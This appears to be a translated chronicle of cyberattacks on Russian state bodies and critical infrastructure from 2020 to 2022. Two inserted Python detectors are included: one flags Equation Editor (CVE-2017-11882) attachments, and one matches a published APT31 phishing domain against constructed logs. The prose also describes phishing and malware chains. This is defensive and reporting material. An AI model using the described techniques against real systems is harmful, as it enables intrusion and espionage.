Attackers pay great attention to attacks that can cause significant public resonance, and many data leaks are published. At the same time, according to the NCCCI, in pursuit of headlines and public resonance, attackers often pass off previously leaked data as new, or compile data obtained from public sources. It is also not uncommon for the breach of a small organization to be presented as a leak from key government systems or CII facilities. This inflates the supposed significance of the event, says Nikolai Murashov.
Separately, the NCCCI notes threats associated with possible disruption of information protection tools. Termination of vendor support, mass revocation of certificates and other restrictions can have a negative impact on the functioning of the Russian segment of the Internet.
To increase the effectiveness of countering the aggravated threats to information security, it is necessary to mobilize and consolidate the forces and technical means of CII subjects, Nikolai Murashov noted.
The NCCCI also cited statistics on connections to GosSOPKA (the State System for Detection, Prevention and Elimination of the Consequences of Computer Attacks): 1,277 new participants joined it, and their total number now exceeds 3.5 thousand.
2022
The number of cyber attacks on the Russian public sector has grown several times
In 2022, the number of attacks on the Russian public sector approximately doubled or tripled compared to a year earlier. Shamil Chich, an analyst at the IZ:SOC cybersecurity monitoring center of Informzaschita, told Vedomosti this (the article was published on January 16, 2023). Read more here.
Russian hackers XakNet announced the hacking of the Ministry of Finance of Ukraine
The hacker group XakNet announced an operation to hack the Ministry of Finance of Ukraine. The work was carried out for several months, Russian hackers reported on November 22, 2022 in their Telegram channel. Read more here.
Muscovite received 6 years in prison for stealing 93 million rubles from banks as part of a hacker group
In October 2022, Muscovite Artem Mazurenko was sentenced to six years in prison on charges of part 2 of Art. 210 (participation in a criminal community) and part 4 of Art. 159.6 of the Criminal Code of the Russian Federation (fraud in the field of computer information committed by an organized group on an especially large scale). Read more here.
Almost half of Russian departments were subjected to cyber attacks
In the 12-month period, which ended in June 2022, almost half (46.6%) of Russian departments faced cyber attacks. Moreover, in 15% of cases, hacker attacks were repeated. This is stated in the study of the Center for Training Leaders and Teams of Digital Transformation of the RANEPA, published in mid-September 2022.
According to the report, excerpts from which Vedomosti cites, 69.6% of attacks on government agencies were carried out using viruses and ransomware, which mainly penetrate through corporate mail or malicious sites. 51.1% of respondents called DoS and DDoS attacks, 46.7% called phishing attacks, 38% called attacks on the corporate network and password hacking, 30.4% called data leakage and unauthorized access.
The main targets of offenders in 73.9% of cases were sites and web applications of departments. This percentage is explained by the fact that at present most employees and customers interact through digital services.
Only 31.9% of state organizations were not subjected to cyber attacks. One in five organizations found it difficult to answer this question.
The survey involved 302 civil servants of various levels from 75 regions and all federal districts. These were respondents with different official status - from digital transformation leaders and senior managers to ordinary employees. The center clarified that the survey participants were segmented by the level of IT competencies and a number of questions were asked only to specialized specialists (92 people).
According to Luka Safonov, technical director of Sinclit JSC, the percentage of attacks on the Russian public sector is much higher.
| I think about 90% of Russian departments and structures have recently been attacked by both schoolchildren opposed to Russia and foreign hackers, Safonov said in mid-September 2022. He added that about 10% of the attacks could have been successful.[10] |
Chinese hackers attacked Russian defense enterprises
A Chinese-speaking cyber group is attacking defense enterprises and state agencies in Russia, Eastern European countries and Afghanistan. This was announced on August 8, 2022 by Kaspersky Lab.
In total, during the investigation, experts revealed attacks on more than a dozen organizations. Presumably, the attackers' goal was cyber espionage. Experts suggest that the identified series of attacks may be related to the activities of the Chinese-speaking cyber group TA428. It used new modifications of previously known backdoors.
In some cases, the attackers managed to seize the IT infrastructure completely. To do this, they used well-prepared phishing emails. They contained internal information that was not available in public sources at the time of its use by the attackers, including the full names of employees working with confidential information and the internal code names of projects. Microsoft Word documents with malicious code exploiting the CVE-2017-11882 vulnerability were attached to the phishing emails. It allows the malware to gain control of the infected system without additional actions from the user; the user is not even required to enable macro execution.
As the main tool for advancing the attack, the attackers used the Ladon utility, which can scan the network, search for and exploit vulnerabilities, and steal passwords. At the final stage, they seized the domain controller and then gained full control over the workstations and servers of the organization that interested them. Having obtained the necessary rights, the attackers proceeded to search for files containing confidential data and upload them to their servers deployed in different countries. The same servers were used to control the malware.
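The phishing documents above exploit CVE-2017-11882, the Equation Editor bug: the malicious Word file carries an OLE object of class Equation.3, which Office hands to the vulnerable EQNEDT32.EXE without asking the user to enable anything. An incident responder triaging a mailbox can flag such attachments before detonation by looking for that object class. The script below is an added example for this page, not Kaspersky's code: it scans RTF and OOXML attachments for the Equation Editor ProgID "Equation.3" and its CLSID {0002CE02-0000-0000-C000-000000000046} (both are documented Microsoft identifiers), and for the RTF \objupdate control word that forces the object to load on open. The sample attachments are constructed inline; a hit is a reason for analyst review, not a verdict, although Equation Editor was removed from Office in January 2018, so a fresh document embedding it is suspicious on its own.

```python
"""Heuristic triage of Office/RTF attachments for Equation Editor (CVE-2017-11882) OLE objects.

Added example, not the page's or Kaspersky's code. Assumes attachments are
available as bytes. Indicators: ProgID "Equation.3" and CLSID
{0002CE02-0000-0000-C000-000000000046}; sample files below are constructed.
"""
import io
import re
import zipfile

EQUATION_PROGID = b"equation.3"
# CLSID of the Equation Editor OLE class, as text and as the 16-byte
# little-endian GUID layout found inside OLE compound files.
EQUATION_CLSID_TEXT = b"0002ce02-0000-0000-c000-000000000046"
EQUATION_CLSID_BIN = bytes.fromhex("02ce020000000000c000000000000046")
# RTF exploit documents carry the OLE stream hex-encoded, so the GUID can also
# appear as ASCII hex of the binary layout.
EQUATION_CLSID_RTFHEX = EQUATION_CLSID_BIN.hex().encode()
RTF_OBJUPDATE = re.compile(rb"\\objupdate")  # makes Word load the object on open


def _scan_blob(name, blob):
    """Return (location, indicator) pairs found in one byte blob."""
    low = blob.lower()
    hits = []
    if EQUATION_PROGID in low:
        hits.append((name, "progid Equation.3"))
    if EQUATION_CLSID_TEXT in low or EQUATION_CLSID_BIN in blob or EQUATION_CLSID_RTFHEX in low:
        hits.append((name, "Equation Editor CLSID"))
    if low.startswith(b"{\\rtf") and RTF_OBJUPDATE.search(low):
        hits.append((name, "RTF \\objupdate (auto-load OLE object)"))
    return hits


def scan_attachment(name, data):
    """Scan a raw attachment; OOXML is a zip, so every entry is scanned."""
    if data.startswith(b"PK\x03\x04"):
        hits = []
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for entry in zf.namelist():
                hits.extend(_scan_blob(f"{name}:{entry}", zf.read(entry)))
        return hits
    return _scan_blob(name, data)


def _build_docx(with_equation):
    """Constructed minimal .docx: optionally embeds an Equation.3 OLE object."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        body = "<w:document/>"
        if with_equation:
            body = '<w:document><o:OLEObject Type="Embed" ProgID="Equation.3" r:id="rId5"/></w:document>'
            # OLE compound file header magic followed by the binary CLSID (constructed, not a real exploit)
            zf.writestr("word/embeddings/oleObject1.bin",
                        b"\xd0\xcf\x11\xe0" + b"\x00" * 8 + EQUATION_CLSID_BIN)
        zf.writestr("word/document.xml", body)
    return buf.getvalue()


# Constructed sample attachments: one RTF with an auto-updating Equation.3 object,
# one .docx embedding Equation.3, one benign .docx.
CONSTRUCTED_SAMPLES = {
    "invoice.rtf": b"{\\rtf1{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}{\\*\\objdata 0105000002000000}}}",
    "report.docx": _build_docx(True),
    "agenda.docx": _build_docx(False),
}


def triage(samples=CONSTRUCTED_SAMPLES):
    """Map each attachment name to its list of indicators (empty list = no hit)."""
    return {name: scan_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, hits in triage().items():
        print(name, hits or "clean")
```

The check is deliberately format-agnostic (byte search rather than full OLE parsing), so it also catches objects hidden in RTF hex streams; for a verdict, detonate the hit in a sandbox or parse the OLE streams with a proper library.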
| Targeted phishing remains one of the most pressing threats to industrial enterprises and government agencies. The series of attacks we discovered is not the first, apparently, in a malicious campaign. Since attackers are successful, we assume that such attacks could happen again in the future. Enterprises and state organizations need to be on the lookout and carry out appropriate work to prepare for repelling complex targeted threats, "said Vyacheslav Kopeitsev, senior expert at Kaspersky ICS CERT. |
Russian-speaking hackers from Killnet paralyzed the work of several Lithuanian government agencies
Hackers from the Killnet group, who warned the Lithuanian authorities about the upcoming large-scale cyber attacks due to blocking the railway transit of goods through the country to the Kaliningrad region, kept their promise and attacked Lithuanian state structures. This became known on June 27, 2022. Read more here.
APT31 cyber group attacks Russian fuel and energy complex and media
In April 2022, PT Expert Security Center specialists from Positive Technologies identified an attack on a number of Russian organizations (media and energy companies) using a malicious document during daily threat monitoring. Representatives of Positive Technologies reported this to TAdviser on August 4, 2022. Read more here.
Presidential administration: 90% of Russia's public sector infrastructure was subjected to cyber attacks
Since the start of the Russian special operation in Ukraine (February 24, 2022), about 90% of the infrastructure of the public sector of the Russian Federation has faced cyber attacks to one degree or another. This was announced on June 16, 2022 by Tatyana Matveeva, head of the Presidential Administration's department for the development of information and communication technologies and communication infrastructure. Read more here.
The website of the Ministry of Construction of Russia was hacked. Hackers blackmail employees with data disclosure
On June 5, 2022, the website of the Ministry of Construction, Housing and Communal Services of Russia was hacked. As a result of a hacker attack, a message appeared on the main page of the department's resource that it was hacked by the team DumpForums.com. Read more here.
Cyber group, attacking the public sector, electricity and aerospace industry in Russia discovered
On May 17, 2022, Positive Technologies announced that its expert center (PT Expert Security Center, PT ESC) had discovered another cybercriminal group. The attackers hit at least five organizations in Russia and one in Georgia, and the exact number of victims in Mongolia is still unknown. Among the targets identified by Positive Technologies specialists are state institutions and enterprises in the aerospace and electric power industries. Read more here.
China initiated a cycle of hacker attacks on Russian authorities
On May 4, 2022, it became known that Chinese hackers had launched a series of attacks on Russian authorities, according to analysts at Google's Threat Analysis Group (TAG). According to their report, the Curious Gorge group is the most active.
Hackers from this group repeatedly attack government, military, logistics and manufacturing organizations in Russia. The Google TAG report was published on May 3, 2022, and it separately noted that Chinese hackers from Curious Gorge last showed themselves at the end of April 2022, attacking the networks of several Russian defense contractors and manufacturers, as well as the Russian Ministry of Foreign Affairs and a Russian logistics company whose name is not given in the report.
What exactly encourages hackers to attack Russian objects remained unknown at the time of publication of the material. The goals of the Curious Gorge group are also various companies in Ukraine and Central Asia.
According to Google TAG, Chinese authorities may be behind Curious Gorge. The group is credited with strong links to the People's Liberation Army Strategic Support Force (PLA SSF). This is a separate branch of the PLA whose area of activity includes the cyber sphere.
The Chinese threat to Russian networks at the beginning of May 2022 is not only Curious Gorge. At the end of April 2022, the Bronze President group chose Russia as its target.
In the reports of various cyber security companies this group appears under several names, including Mustang Panda, TA416 and RedDelta. Its activity was first mentioned in 2018, and traces of it were most often found in Asian countries.
| This suggests that the attackers received updated tasks that reflect the changing intelligence-gathering requirements of the People's Republic of China, the researchers say. |
Secureworks experts suggest that Russia's appearance in Bronze President's field of view may indicate "an attempt by China to inject modern malware into the computer systems of Russian officials." They discovered and analyzed a malicious executable distributed by the group, "Blagoveshchensk - Blagoveshchensk Border Detachment.exe," which was disguised as a PDF file. Inside it was a loader for the PlugX malware.
Blagoveshchensk is a city near the border with China. Russian army units are stationed there.
When launched, the file displays a decoy document, for some reason written in English, describing the situation with refugees and EU sanctions. While the user who launched the file reads the document, the PlugX malware is downloaded to the computer in the background from the command and control server. PlugX is a remote access Trojan used to steal files, execute remote commands, install backdoors, and deploy additional malware. It is one of Bronze President's tools; the group also uses Cobalt Strike, China Chopper, RCSession and ORat.
China is one of the countries that have not officially joined the anti-Russian sanctions imposed over the special operation in Ukraine. At the same time, the PRC does not take Russia's side and demonstrates neutrality on the matter. The attacks by Bronze President and Curious Gorge on Russian networks are further confirmation that China may have its own interests in the confrontation between Russia and the rest of the world.[11]
Russian hackers suspected of cyber attacks on German renewable power companies
Three German renewable energy companies have been hacked amid the countries' refusal of Russian oil. This became known on April 27, 2022. Read more here.
Positive Technologies: government agencies are the worst protected from cyber attacks
In Russia, state bodies are worst protected from hacker attacks, according to Positive Technologies, a company specializing in information security technologies. Experts made the corresponding statement in mid-April 2022.
| Federal ministries and departments show the least degree of readiness for cyber attacks. Officials are now forced to live in the paradigm of the past time - said Maxim Filippov, director of business development at Positive Technologies in Russia. |
According to him, procurement procedures are defined by 44-FZ and 223-FZ. To purchase some protection tool, which by April 2022 had become more relevant than ever, or to let experts onto their facilities to conduct a retrospective investigation or to reconfigure protection tools, agencies have to go through a large number of difficult procedures. They do not have time to respond, while the dynamics and types of attacks change every minute. If you do not detect and respond quickly, there will be nothing left to protect, Filippov said.
He also pointed out that state structures and companies with state participation are opponents of information exchange with experts about past cyber attacks.
| Government agencies are afraid of publicizing these incidents even within the circle of expert companies. This is not at all clear to me personally. In the current environment, they need collaboration with experts who are focused on ensuring the security of infrastructure in cyberspace like air, he added. |
The Positive Technologies business development director cited data according to which cyber attack activity against companies and government agencies in the Russian Federation increased 100-fold from late February to mid-April 2022; banks were the best prepared for cyber attacks, and federal departments and companies with state participation the least.[12]
Departmental website of the Ministry of Emergency Situations was subjected to a hacker attack
On April 20, 2022, it became known that unknown persons hacked the website of the departmental media outlet of the Russian Ministry of Emergency Situations. This was reported on the page of the same name on the VKontakte social network. Read more here.
Hackers hacked the website of the Russian Emergencies Ministry and the heads of the ministry in the regions
On March 16, 2022, it became known about the hacking of the official website of the Ministry of Civil Defense, Emergencies and Disaster Management (EMERCOM of Russia). As a result of a cyber attack by unknown hackers, the web resource of not only the federal department but also all of its regional headquarters became unavailable. Read more here.
Russian Foreign Ministry confirms cyber attack on ministry employees
On January 18, 2022, it became known about cyber attacks on employees of the Russian Ministry of Foreign Affairs. According to the information security companies Cluster25 (part of DuskRise) and Black Lotus Labs (part of Lumen Technologies), the North Korean hacker group Konni is allegedly behind these attacks. Read more here.
2021
More than 90% of attacks by highly professional groups are directed at critical infrastructure facilities
The vast majority (92%) of cyber attacks committed by highly professional attackers in 2021 were aimed at critical information infrastructure (CII) facilities. Most often, the attention of highly qualified hackers, cyber mercenaries and pro-government groups, was attracted by state organizations, energy enterprises, industry and the military-industrial complex. Such figures were announced on December 7, 2021 by Igor Lyapunov, Rostelecom vice president for cybersecurity and general director of Rostelecom-Solar.
In total, according to a Rostelecom-Solar study, over 300 attacks carried out by professional attackers were recorded in 2021, one third more than in 2020. Most of the attacks were carried out by groups of average qualification, i.e. cybercrime. Such hackers use customized tools, publicly available malware and vulnerabilities, and social engineering, and their main goal is to monetize the attack directly via ransomware, cryptomining or cashing out.
Highly professional groups accounted for 18% of the attacks committed during the reporting period. Such attackers use complex tools: self-written software, 0-day vulnerabilities, and previously implanted backdoors ("bookmarks"). As a rule, they work to order, for cyber espionage, hacktivism, or complete seizure of infrastructure, and their victims are large businesses and CII facilities.
| Such attacks are almost always targeted, so the attackers first carefully study the attacked organization. Moreover, cyber mercenaries and pro-government groups conduct reconnaissance not only against the victim's IT perimeter, but also against its contractors, "said Vladimir Dryukov, director of the Solar JSOC cyber attack monitoring and response center at Rostelecom-Solar. - These groups are well acquainted with the logic of basic information protection tools, which allows them to remain unnoticed for a long time. And the damage from their actions can amount to hundreds of millions of rubles. If we are talking about CII, there are also risks associated with the impact on the country's economy as a whole, the security of citizens and the political situation. |
The key techniques used by professional hackers to breach the perimeter changed little over the year. Phishing still leads among medium-level attackers (60% of attacks), which is explained by its low cost and mass character.
In 50% of attacks, highly qualified hackers exploit web vulnerabilities. This is because the web applications of CII facilities and state authorities (for example, corporate portals or web mail) are still poorly protected and contain a huge number of flaws. In addition, highly professional attackers resort to attacks through a contractor more often than cybercriminals do, and the number of such attacks has been growing for several years. Phishing, on the contrary, is used by them in only 2% of cases. The most popular breach techniques of 2021 also included exploitation of the MS Exchange vulnerabilities published at the end of 2020.
As a year earlier, attackers most often used startup mechanisms and system services to gain persistence inside the network. To advance the overwhelming majority of attacks they used the remote services RDP, SMB and SSH. In particular, this is due to the massive shift to remote work: companies began to actively use these protocols, which provide remote access to files and devices.
Hacker group attacking Russian fuel and energy complex and aviation industry discovered
At the end of September 2021, it became known about the appearance of a new hacker group ChamelGang, which was seen in attacks on critical information infrastructure, including in Russia. Read more here.
A large-scale cyber attack against the public sector has been registered in Russia
On September 22, 2021, it became known about a large-scale cyber attack on state institutions and departments of Russia and neighboring countries. This was reported in the British company Cyjax, specializing in information security.
As Kommersant writes with reference to the Cyjax study, the phishing attack was organized, in particular, against the Russian Academy of Sciences (RAS), the Mail.ru Group postal service, and government agencies of more than a dozen countries, including Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Turkey, Turkmenistan, Ukraine, Uzbekistan and China.
The Mail.ru Group said it controls the emergence of phishing sites and fraudulent emails in order to "respond in a timely manner to such incidents, including those listed in the report." The company added that the mail runs an automatic antispam system that adapts to new spam scenarios, including phishing.
Experts reported the existence of 15 sites that imitate the email login portals of the Ministries of Foreign Affairs, Finance or Energy of various countries.
The attackers used a site disguised as the corporate email service. The scheme works like this: employees are notified that a new portal has appeared on which they need to register. The hackers then obtain their logins and passwords, as well as access to the victims' correspondence. As a result, the attackers are able to send infected files to the partners of the company or agency.
According to Cyjax, the purpose of the attack is to collect logins and passwords to access the mailboxes of civil servants. Given the lack of immediate financial benefits from the attack and the focus on the Russian Federation and neighboring countries, a certain pro-state group may be behind it, Cyjax believes.
According to Alexei Novikov, director of the Positive Technologies security expert center, hackers can use the access they gain to continue the attack by sending letters with a malicious attachment to the company's partners.[13]
Ministry of Digital Development: 50% of cyber attacks on online voting came from the United States
On September 20, 2021, the Ministry of Digital Development named the countries from which the cyber attacks on electronic voting systems in Russia were carried out. About half of the IP addresses used by the hackers were in the United States. Read more here.
US ambassador summoned to Russian Foreign Ministry due to interference in Russian elections
On September 11, 2021, it became known that the Russian Ministry of Foreign Affairs had summoned US Ambassador to Moscow John Sullivan to discuss the interference of American IT companies in the State Duma elections.
Deputy Foreign Minister Sergei Ryabkov told John Sullivan, summoned to the Russian Foreign Ministry on September 10, about the inadmissibility of interference in Russian affairs. Ryabkov also told the diplomat that there was evidence of violations of Russian law by American digital giants ahead of the State Duma elections. That evidence is overwhelming, he said.
According to the US State Department, their ambassador discussed issues of bilateral relations at the Russian Foreign Ministry on Friday, namely, he participated in a conversation about support for "the desire of US President Joe Biden for stable and predictable relations with Russia."[14]
Chinese government hackers attacked the Russian public sector
Chinese government hackers attacked Russian companies. This became known on August 3, 2021.
Traces of attacks by the hacker group APT31, known for numerous attacks on state structures of various countries, have been recorded. The group attacked Russian companies for the first time. According to Positive Technologies, in the first half of 2021 APT31, in addition to its activity in Russia, conducted about ten malicious mailings in Mongolia, the USA, Canada and Belarus.
The hacker group APT31, also known as Hurricane Panda and Zirconium, has been operating since the 2010s. It mainly attacks the public sector, spying on potential victims and collecting confidential information. Microsoft previously indicated that APT31 operates from China, and in mid-July the British government linked the group's activities to the Chinese Ministry of State Security.
According to Positive Technologies experts, since spring 2021 APT31 has begun to expand the geography of its attacks and to use a different way of breaching and infecting devices. According to the company, the hackers send phishing emails containing a link to a fake domain, inst.rsnet-devel[.]com, which imitates the domain of certain government agencies. When the link is opened, a so-called dropper lands on the user's computer; it writes a malicious library to the infected device and installs a special application. The application then calls one of the functions of the malicious library, and control of the computer passes to the attacker.
Daniil Koloskov, senior specialist in the information security threat research department at Positive Technologies, warns that the malware developers try to make the malicious library as similar as possible to the original one: the names of the exported functions of the malicious library partially coincide with those of the legitimate one. Another trick: in some attacks the dropper carried a real, valid digital signature, so many security tools treated it as a program from a certified vendor. Positive Technologies experts believe the signing certificate was most likely stolen, which indicates that the group is well prepared.
Denis Kuvshinov, head of the information security threat research department at Positive Technologies, predicts that in the near future APT31 will use other tools in attacks, including against Russia, which could be detected through overlaps in code or network infrastructure. Positive Technologies specialists have already reported the attack they recorded to GosSOPKA (the State System for Detection, Prevention and Elimination of the Consequences of Computer Attacks). The company does not expect the number of APT31 cyber attacks to decrease in the near future, so it advises commercial and other organizations to load the indicators of compromise into their security tools to detect such malware in time.[15]
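Both the fake mail-registration portal described in the Cyjax report and the APT31 lookalike domain inst.rsnet-devel[.]com above are caught the same way on the defender's side: refang the published indicator, then run it against proxy or DNS logs, and separately flag hostnames that borrow the organization's brand under a domain the organization does not own. The script below is an added example, not Positive Technologies' or Cyjax's code. The only real indicator in it is the defanged domain from the page; the log lines, the brand token "rsnet" (taken from that indicator) and the allowlisted domain example.org are constructed for the example, and the registrable-domain logic is a two-label simplification that would need a public suffix list for ccSLDs such as .co.uk.

```python
"""Refang published IOCs and match them, plus brand lookalikes, against proxy log hostnames.

Added example, not the page's or any vendor's code. WATCHED_IOCS holds the one
defanged domain from the page; BRAND_TOKENS, ALLOWED_REGISTRABLE and the log
lines are constructed assumptions for the demonstration.
"""
import re
from urllib.parse import urlsplit

WATCHED_IOCS = ["inst.rsnet-devel[.]com"]   # defanged indicator from the report
BRAND_TOKENS = ["rsnet"]                     # assumption: brand the phishing domain imitates
ALLOWED_REGISTRABLE = {"example.org"}        # hypothetical legitimate domains of the organization


def refang(ioc):
    """Turn a defanged indicator (hxxp://, [.], (.), {.}) back into a usable string."""
    s = ioc.strip().lower()
    s = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", s)
    s = re.sub(r"^hxxp", "http", s)          # hxxp -> http, hxxps -> https
    return s


def hostname_of(ioc_or_url):
    """Extract the hostname from a (possibly defanged) URL or bare domain."""
    s = refang(ioc_or_url)
    if "://" in s:
        return urlsplit(s).hostname or ""
    return s.split("/", 1)[0]


def registrable(host):
    """Two-label simplification of the registrable domain (no public suffix list)."""
    parts = host.rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def matches_ioc(host, ioc_hosts):
    """True if host equals a watched domain or is a subdomain of one."""
    return any(host == i or host.endswith("." + i) for i in ioc_hosts)


def looks_like_brand(host, tokens=BRAND_TOKENS, allowed=ALLOWED_REGISTRABLE):
    """True if a brand token appears in any label of a host we do not own."""
    if registrable(host) in allowed:
        return False
    return any(tok in label for label in host.split(".") for tok in tokens)


# Constructed proxy log format: "<timestamp> <client ip> <url>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\d+\.\d+\.\d+\.\d+)\s+(?P<url>\S+)")


def scan_log(lines, iocs=WATCHED_IOCS):
    """Return (client ip, hostname, reason) for every log line worth an alert."""
    ioc_hosts = [hostname_of(i) for i in iocs]
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # malformed lines are skipped, not fatal
        host = hostname_of(m["url"])
        if matches_ioc(host, ioc_hosts):
            alerts.append((m["src"], host, "known IOC"))
        elif looks_like_brand(host):
            alerts.append((m["src"], host, "brand lookalike, not allowlisted"))
    return alerts


# Constructed sample log: one hit on the published IOC, one lookalike registration
# portal of the kind the Cyjax report describes, two legitimate requests, one junk line.
CONSTRUCTED_LOG = [
    "2021-08-02T09:14:03Z 10.20.30.41 http://inst.rsnet-devel.com/login",
    "2021-08-02T09:15:10Z 10.20.30.41 https://mail.example.org/owa/",
    "2021-08-02T09:16:55Z 10.20.30.77 https://portal.rsnet-mail.net/register",
    "2021-08-02T09:17:02Z 10.20.30.78 https://www.example.org/news",
    "malformed line",
]

if __name__ == "__main__":
    for alert in scan_log(CONSTRUCTED_LOG):
        print(alert)
```

The subdomain match matters because indicators are often published as a registrable domain while the phishing page sits on a host under it; the lookalike branch catches the next domain the same operator registers before any vendor publishes it, at the cost of false positives that the allowlist must absorb.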
The number of cyber attacks on critical infrastructure of the Russian Federation increased by 150%
The number of cyber attacks on critical infrastructure of the Russian Federation increased by 150%. This became known on July 12, 2021.
In 2020, the figure also increased, but by only 40%. Ransomware mainly hit the education and science sectors, as well as industry; these accounted for 30% of the total number of attacks.
The Russian company Group-IB calculated that 40% of all attacks are carried out by "classic" cybercriminals, while the remaining 60% come from pro-government groups of other states.
Industrial companies are in most cases attacked by ransomware. It turns out that every large company is a potential victim for cybercriminals, and the ransom amounts are increasing.
Experts predict that the number of cyber attacks in the future will only increase, and the amounts requested by fraudsters will grow[16]
A surge in hacker attacks on Russian research institutes
In mid-April 2021, it became known about a surge in hacker attacks on Russian research institutes (NII). First of all, foreign hackers are interested in institutions that are engaged in military and aviation development, as well as the creation of vaccines against the coronavirus COVID-19, according to Group-IB, a company specializing in information security.
Doctor Web confirmed this trend to Kommersant. According to Igor Zdobnov, head of the Doctor Web virus laboratory, targeted attacks are difficult to detect, since they concern only one company, while "blind" attacks hit a large number of targets. Behind the cyber attacks on the research institutes are hackers sponsored by the authorities of various countries for the purpose of espionage, the expert is sure.
Igor Zalevsky, head of the cyber incident investigation department at Rostelecom-Solar, points to the possibility of using information stolen from research institutes for political purposes, and sees this as the reason for the interest of state-sponsored hackers in them. The work of the institutes involves unique information from various industries: diagrams, product drawings, closed studies, which are intellectual property, the expert lists. Such data may be interesting both for monetization and simply on the black market, he added.
Sometimes hackers use several malware families at once. For example, on the network of one client, Group-IB specialists identified six types of such programs, including in the accounting system and on employees' workstations and mobile devices. At the same time, attackers usually do not launch Trojans into a research institute's network immediately, but first use auxiliary modules that prevent detection, said Denis Legezo, senior cybersecurity expert at Kaspersky Lab.[17]
Cyber attacks through contractors hit banks and enterprises of the fuel and energy complex in Russia
At the end of March 2021, Rostelecom-Solar, a provider of information asset protection services, published a study reporting a twofold increase in 2020 in the number of attacks on critical information infrastructure (CII) facilities (banks, fuel and energy enterprises, etc.) carried out by penetrating through a contractor's infrastructure (the supply chain method). In total, the Solar JSOC monitoring and response center of Rostelecom-Solar identified and repelled over 1.9 million cyber attacks, 73% more than in 2019.
According to the experts, hacking a contractor has become the most effective method for cybercriminals to penetrate a targeted infrastructure, which as a rule belongs to the largest federal public sector organizations and CII facilities. International experience confirms this. At the end of 2020, it became known about the hacking of the software developer SolarWinds, as a result of which clients such as Microsoft, Cisco and FireEye, as well as several key US ministries and departments, were affected. Solar JSOC records similar attack attempts against Russian authorities and facilities.
The active use of the supply chain method is associated with an increase in the number of more complex targeted attacks. In addition, organizations are increasingly outsourcing part of their internal processes, but they rarely monitor their own infrastructure and practically do not control the connection points of third-party companies to their network. As a result, the problem can remain out of focus for a long time. This is what led to the growth of such attacks in 2020.
Rostelecom-Solar noted that the growing popularity of the supply chain method indicates not just a change in the technical specifics of attacks but the emergence of a new key cybersecurity threat at the state level. However, there is no clear solution yet for how to minimize the risks. Even a contractor certified by the regulator for compliance with information security standards can be successfully attacked. At the same time, the customer company has no way to directly control the level of information security protection at the outsourcer, the experts added.
| Obviously, advanced APT groups will increasingly use the supply chain technique, so the information security community needs to develop a fundamental approach to solving the problem as soon as possible, said Vladimir Dryukov, director of the Solar JSOC cyber attack monitoring and response center at Rostelecom-Solar. |
Also, for the first time since 2017, Solar JSOC experts recorded an increase in violations committed by internal users, that is, ordinary employees of companies. More than half (53%) of internal incidents were related to information leaks: after switching to remote work, employees began to commit violations, including theft and leaking of data, which they would not have dared to do in the office. In addition, the pandemic led to an increase in violations related to Internet access. This is not only about visiting suspicious sites from a work computer: remote workers could also gain illegitimate access to the company's closed resources, since it is difficult to correctly segment a corporate network built on a VPN.
The most common tool of external attackers has become malware, and the main way of delivering it to the victim's infrastructure is phishing emails, most of which exploited the topic of COVID-19. At the same time, there is a significant increase (by a third) in the number of attacks using ransomware: during the period of mass remote work, when many companies weakened their information security, this already simple method of monetization became even more popular.
In 2020, the number of attacks aimed at gaining control over infrastructure increased by 30%, while the number of attacks aimed at stealing funds increased slightly (by less than 10%). This indicates a significant increase in the qualifications of attackers and the complication of their tools.
2020 Report on Attacks and Tools of Professional Groups
2020
120 thousand cyber attacks were committed on the IT systems of government agencies, banks and the fuel and energy complex of Russia
More than 120 thousand hacker attacks were committed on the critical information infrastructure of Russia (this includes the IT systems of government agencies, banks, the fuel and energy complex, etc.) in 2020. This figure was announced on June 24, 2021 by the Secretary of the Security Council of the Russian Federation, Army General Nikolai Patrushev.
According to him, cyberspace is increasingly becoming the scene of the fight against "geopolitical opponents," and Russia is regularly subjected to computer attacks.
| Most of them were carried out from the United States, Germany and the Netherlands, and were directed against the objects of public administration, the military-industrial complex, health care, transport, science and education of our country, he said. |
As the Secretary of the Security Council noted, Russia advocates non-politicized cooperation between countries to create a global cybersecurity system.
| Russia advocates the development of international cooperation in the interests of the formation of a global international legal regime that ensures the safe and equal use of information and communication technologies, he stressed in an interview with Rossiyskaya Gazeta. |
On June 24, 2021, Group-IB cited data according to which three times as many attacks on critical infrastructure facilities were registered in Russia in the first half of 2020 as in the whole of 2019. 40% of attacks on KII facilities in Russia were committed by cybercriminals, 60% by pro-state attackers.
Nikita Kislitsin, head of the Network Security Department of Group-IB, noted that about 8 out of 10 Russian industrial enterprises have problems with servicing the IT infrastructure.
According to experts, problems with servicing the IT infrastructure of organizations are caused by a lack of resources, outdated software and often an unfinished patch management process.[18]
Number of cyber attacks on authorities doubled - FSB information security center
More than half (58%) of cyber attacks in Russia in 2020 fell on state authorities, while in 2019 this share was 27%. Such data at the end of April 2021 were cited by the Deputy Director of the National Coordination Center for Computer Incidents (NCCCI; coordinates the detection, prevention and elimination of the consequences of computer attacks on critical information infrastructure in Russia and response to computer incidents) Nikolai Murashov.
| An analysis of the data conducted by the NCCCI showed that if in 2019 the largest share of computer attacks was aimed at the credit and financial sector (33%), then in 2020 it was aimed at the information resources of state authorities and industrial enterprises, Murashov said at an online briefing (quoted by RIA Novosti). |
According to him, the share of hacker attacks on the IT systems of industrial enterprises in 2020 reached 38% against 18% a year earlier.
Earlier, Secretary of the Security Council of the Russian Federation Nikolai Patrushev said that the intensity of foreign intelligence in cyberspace has increased significantly against the background of the aggravation of the situation in the world, and the number of hacker attacks on Russian information resources in 2020 increased 1.6 times.
Patrushev noted the annual growth of hacker attacks on the IT resources of authorities and companies "in order to block them, gain access to protected data banks and covert management of information systems."
| At the same time, the issue of exploiting vulnerabilities of software used in government agencies and organizations for intelligence purposes remains relevant. More than 30% of the identified vulnerabilities can be used remotely to conduct computer attacks on the information infrastructure, said the Secretary of the Security Council of the Russian Federation.[19] |
Kemerovo resident convicted of cyber attacks on KII RF
A Kemerovo resident was convicted of cyber attacks on the KII of the Russian Federation. This became known on November 27, 2020. Read more here.
